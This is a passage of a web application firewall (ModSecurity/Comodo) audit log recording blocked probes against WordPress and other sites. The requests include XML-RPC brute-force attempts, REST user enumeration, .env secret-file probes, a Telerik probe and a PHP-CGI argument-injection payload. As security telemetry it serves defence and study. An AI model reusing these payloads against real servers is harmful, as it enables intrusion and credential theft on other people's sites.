[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748094202907311 4724 (- - -) Stopwatch2: 1748094202907311 4724; combined=3601, p1=380, p2=3057, p3=0, p4=0, p5=95, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee048637-Z-- --c5fd7302-A-- [24/May/2025:20:45:25 +0700] aDHNdeO2UzDOKMmK0i6wygAAABE 103.236.140.4 59268 103.236.140.4 8181 --c5fd7302-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 67.205.42.207 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 67.205.42.207 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c5fd7302-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix4711 --c5fd7302-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5fd7302-E-- --c5fd7302-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 67.205.42.207 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748094325932403 5362 (- - -) Stopwatch2: 1748094325932403 5362; combined=3778, p1=436, p2=3144, p3=0, p4=0, p5=119, sr=77, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5fd7302-Z-- --3871b477-A-- [24/May/2025:20:47:18 +0700] aDHN5uO2UzDOKMmK0i6w3gAAABc 103.236.140.4 59360 103.236.140.4 8181 --3871b477-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 166.108.228.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 166.108.228.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Proxy-Connection: close --3871b477-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3871b477-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748094438166935 2753 (- - -) Stopwatch2: 1748094438166935 2753; combined=1023, p1=476, p2=514, p3=0, p4=0, p5=32, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3871b477-Z-- --fcc61419-A-- [24/May/2025:20:47:21 +0700] aDHN6fmzt4abyoi_U9kPiAAAAII 103.236.140.4 59364 103.236.140.4 8181 --fcc61419-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 67.205.42.207 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 67.205.42.207 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fcc61419-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix68 --fcc61419-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcc61419-E-- --fcc61419-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 67.205.42.207 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748094441982045 6171 (- - -) Stopwatch2: 1748094441982045 6171; combined=4383, p1=521, p2=3675, p3=0, p4=0, p5=111, sr=85, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcc61419-Z-- --c0e1a839-A-- [24/May/2025:21:03:17 +0700] aDHRpeO2UzDOKMmK0i6xWgAAAAs 103.236.140.4 59884 103.236.140.4 8181 --c0e1a839-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.241.253.132 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.241.253.132 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c0e1a839-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix0000 --c0e1a839-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0e1a839-E-- --c0e1a839-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.241.253.132 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748095397148913 5789 (- - -) Stopwatch2: 1748095397148913 5789; combined=4083, p1=522, p2=3399, p3=0, p4=0, p5=96, sr=106, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0e1a839-Z-- --3df2b256-A-- [24/May/2025:21:05:34 +0700] aDHSLuunkxaVeh4NwhbmfwAAAEM 103.236.140.4 59930 103.236.140.4 8181 --3df2b256-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.60.15.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.60.15.51 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3df2b256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3df2b256-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748095534214187 13740 (- - -) Stopwatch2: 1748095534214187 13740; combined=22810, p1=447, p2=838, p3=0, p4=0, p5=10777, sr=75, sw=0, l=0, gc=10748 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3df2b256-Z-- --c1a12b1a-A-- [24/May/2025:21:08:19 +0700] aDHS0zvI5DIWBJ2mFG5d7gAAAMo 103.236.140.4 60106 103.236.140.4 8181 --c1a12b1a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.138.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.138.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c1a12b1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1a12b1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748095699928475 2787 (- - -) Stopwatch2: 1748095699928475 2787; combined=1323, p1=443, p2=849, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1a12b1a-Z-- --5e1c944c-A-- [24/May/2025:21:09:10 +0700] aDHTBuO2UzDOKMmK0i6xgAAAAAk 103.236.140.4 60122 103.236.140.4 8181 --5e1c944c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.240.70.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.240.70.125 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5e1c944c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix1202 --5e1c944c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e1c944c-E-- --5e1c944c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.240.70.125 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748095750290800 5744 (- - -) Stopwatch2: 1748095750290800 5744; combined=4088, p1=504, p2=3420, p3=0, p4=0, p5=97, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e1c944c-Z-- --d569fe1a-A-- [24/May/2025:21:23:22 +0700] aDHWWuunkxaVeh4Nwhbm-wAAAEY 103.236.140.4 60500 103.236.140.4 8181 --d569fe1a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 171.244.40.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 171.244.40.232 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --d569fe1a-C-- --d569fe1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d569fe1a-E-- --d569fe1a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748096602441627 3934 (- - -) Stopwatch2: 1748096602441627 3934; combined=2885, p1=429, p2=2424, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d569fe1a-Z-- --fa032835-A-- [24/May/2025:21:30:48 +0700] aDHYGDvI5DIWBJ2mFG5eEAAAANI 103.236.140.4 60792 103.236.140.4 8181 --fa032835-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 147.182.252.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 147.182.252.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fa032835-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa032835-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748097048051513 3264 (- - -) Stopwatch2: 1748097048051513 3264; combined=1434, p1=487, p2=913, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa032835-Z-- --0c5f5535-A-- [24/May/2025:21:39:20 +0700] aDHaGOunkxaVeh4NwhbnuQAAAEs 103.236.140.4 32912 103.236.140.4 8181 --0c5f5535-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.156.128.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.156.128.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* --0c5f5535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c5f5535-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748097560439138 3644 (- - -) Stopwatch2: 1748097560439138 3644; combined=1795, p1=501, p2=1257, p3=0, p4=0, p5=37, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c5f5535-Z-- --c0185117-A-- [24/May/2025:21:48:23 +0700] aDHcN-unkxaVeh4NwhboCQAAAEo 103.236.140.4 33412 103.236.140.4 8181 --c0185117-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.199.117.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.199.117.176 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c0185117-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0185117-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748098103813337 2279 (- - -) Stopwatch2: 1748098103813337 2279; combined=1019, p1=364, p2=627, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0185117-Z-- --a8620179-A-- [24/May/2025:21:57:19 +0700] aDHeT_mzt4abyoi_U9kR0gAAAIg 103.236.140.4 34572 103.236.140.4 8181 --a8620179-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36 Accept-Charset: utf-8 --a8620179-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8620179-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748098639744162 822 (- - -) Stopwatch2: 1748098639744162 822; combined=351, p1=312, p2=0, p3=0, p4=0, p5=39, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8620179-Z-- --00795e07-A-- [24/May/2025:22:49:24 +0700] aDHqhOO2UzDOKMmK0i6ynQAAAAA 103.236.140.4 36536 103.236.140.4 8181 --00795e07-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.47.153.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.47.153.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --00795e07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00795e07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748101764774579 3267 (- - -) Stopwatch2: 1748101764774579 3267; combined=1433, p1=480, p2=920, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00795e07-Z-- --430be84f-A-- [25/May/2025:00:02:07 +0700] aDH7jzvI5DIWBJ2mFG5hCAAAANE 103.236.140.4 45894 103.236.140.4 8181 --430be84f-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/80.0.180 Chrome/74.0.3729.180 Safari/537.36 Accept-Charset: utf-8 --430be84f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --430be84f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748106127908472 1011 (- - -) Stopwatch2: 1748106127908472 1011; combined=421, p1=374, p2=0, p3=0, p4=0, p5=46, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --430be84f-Z-- --1077e219-A-- [25/May/2025:00:03:44 +0700] aDH78DvI5DIWBJ2mFG5hIQAAAMc 103.236.140.4 45978 103.236.140.4 8181 --1077e219-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 209.97.180.8 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --1077e219-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1077e219-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748106224360896 831 (- - -) Stopwatch2: 1748106224360896 831; combined=330, p1=293, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1077e219-Z-- --ce24be06-A-- [25/May/2025:00:31:19 +0700] aDICZzvI5DIWBJ2mFG5iHwAAAMw 103.236.140.4 46844 103.236.140.4 8181 --ce24be06-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.22.67.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.22.67.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ce24be06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce24be06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748107879227855 2696 (- - -) Stopwatch2: 1748107879227855 2696; combined=1370, p1=444, p2=890, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce24be06-Z-- --2ef6725e-A-- [25/May/2025:00:35:08 +0700] aDIDTDvI5DIWBJ2mFG5iSwAAAME 103.236.140.4 46980 103.236.140.4 8181 --2ef6725e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.2.52.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.52.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2ef6725e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ef6725e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at 